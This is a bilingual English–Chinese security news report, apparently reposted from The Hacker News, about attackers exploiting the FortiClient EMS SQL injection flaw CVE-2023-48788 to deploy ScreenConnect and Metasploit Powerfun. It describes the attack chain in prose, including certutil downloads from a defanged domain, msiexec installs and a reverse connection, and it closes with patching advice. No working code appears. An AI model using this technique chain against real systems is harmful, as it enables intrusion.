Cybersecurity researchers have discovered a new campaign that's exploiting a recently disclosed security flaw in Fortinet FortiClient EMS devices to deliver ScreenConnect and Metasploit Powerfun payloads.
网络安全研究人员发现了一个新的攻击活动,利用最近披露的Fortinet FortiClient EMS设备的安全漏洞,传送ScreenConnect和Metasploit Powerfun有效载荷。
The activity entails the exploitation of CVE-2023-48788 (CVSS score: 9.3), a critical SQL injection flaw that could permit an unauthenticated attacker to execute unauthorized code or commands via specifically crafted requests.
该活动涉及利用CVE-2023-48788 (CVSS评分: 9.3),这是一个关键的SQL注入漏洞,可以允许未经身份验证的攻击者通过特制请求执行未经授权的代码或命令。
Cybersecurity firm Forescout is tracking the campaign under the codename Connect:fun owing to the use of ScreenConnect and Powerfun for post-exploitation.
网络安全公司Forescout正在追踪这个活动,代号为Connect:fun,因为使用了ScreenConnect和Powerfun进行后期利用。
The intrusion targeted an unnamed media company that had its vulnerable FortiClient EMS device exposed to the internet shortly after the release of a proof-of-concept (PoC) exploit for the flaw on March 21, 2024.
入侵针对一个未透露名称的媒体公司,该公司的易受攻击的FortiClient EMS设备在2024年3月21日的一个漏洞利用示范(PoC)的发布后不久暴露在互联网上。
Over the next couple of days, the unknown adversary was observed leveraging the flaw to unsuccessfully download ScreenConnect and then install the remote desktop software using the msiexec utility.
在接下来的几天里,未知的对手被发现利用该漏洞未能下载ScreenConnect,然后使用msiexec实用程序安装远程桌面软件。
However, on March 25, the PoC exploit was used to launch PowerShell code that downloaded Metasploit's Powerfun script and initiated a reverse connection to another IP address.
然而,在3月25日,PoC漏洞被用来启动PowerShell代码,下载Metasploit的Powerfun脚本,并发起与另一个IP地址的反向连接。
Also detected were SQL statements designed to download ScreenConnect from a remote domain ("ursketz[.]com") using certutil, which was then installed via msiexec before establishing connections with a command-and-control (C2) server.
还检测到设计用于从远程域("ursketz[.]com")下载ScreenConnect的SQL语句,使用certutil,然后通过msiexec安装,然后与命令和控制(C2)服务器建立连接。
There is evidence to suggest that the threat actor behind it has been active since at least 2022, specifically singling out Fortinet appliances and using Vietnamese and German languages in their infrastructure.
有证据表明,背后的威胁行为者至少自2022年以来一直活跃,特别是针对Fortinet设备,并在其基础设施中使用越南语和德语。
"The observed activity clearly has a manual component evidenced by all the failed attempts to download and install tools, as well as the relatively long time taken between attempts," security researcher Sai Molige said.
安全研究人员Sai Molige表示:“观察到的活动明显具有手动组件的证据,所有下载和安装工具的尝试都失败了,而且尝试之间所花费的时间相对较长。
"This is evidence that this activity is part of a specific campaign, rather than an exploit included in automated cybercriminal botnets. From our observations, it appears that the actors behind this campaign are not mass scanning but choosing target environments that have VPN appliances."
这证明了这个活动是一个特定活动的一部分,而不是包含在自动化的网络犯罪僵尸网络中的漏洞。根据我们的观察,看起来这个活动背后的行动者并不是大规模扫描,而是选择了具有VPN设备的目标环境。
Forescout said the attack shares tactical and infrastructure overlaps with other incidents documented by Palo Alto Networks Unit 42 and Blumira in March 2024 that involve the abuse of CVE-2023-48788 to download ScreenConnect and Atera.
Forescout表示,这次攻击与Palo Alto Networks Unit 42和Blumira在2024年3月记录的其他事件存在战术和基础设施重叠,这些事件涉及滥用CVE-2023-48788下载ScreenConnect和Atera。
Organizations are recommended to apply patches provided by Fortinet to address potential threats, monitor for suspicious traffic, and use a web application firewall (WAF) to block potentially malicious requests.
建议组织应用Fortinet提供的补丁来应对潜在威胁,监控可疑流量,并使用Web应用程序防火墙(WAF)来阻止可能的恶意请求。
参考资料
[1]https://thehackernews.com/2024/04/hackers-exploit-fortinet-flaw-deploy.html
关注我们
欢迎来到我们的公众号!我们专注于全球网络安全和精选双语资讯,为您带来最新的资讯和深入的分析。在这里,您可以了解世界各地的网络安全事件,同时通过我们的双语新闻,获取更多的行业知识。感谢您选择关注我们,我们将继续努力,为您带来有价值的内容。
原文始发于微信公众号(知机安全):新攻击:黑客部署ScreenConnect和Metasploit
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论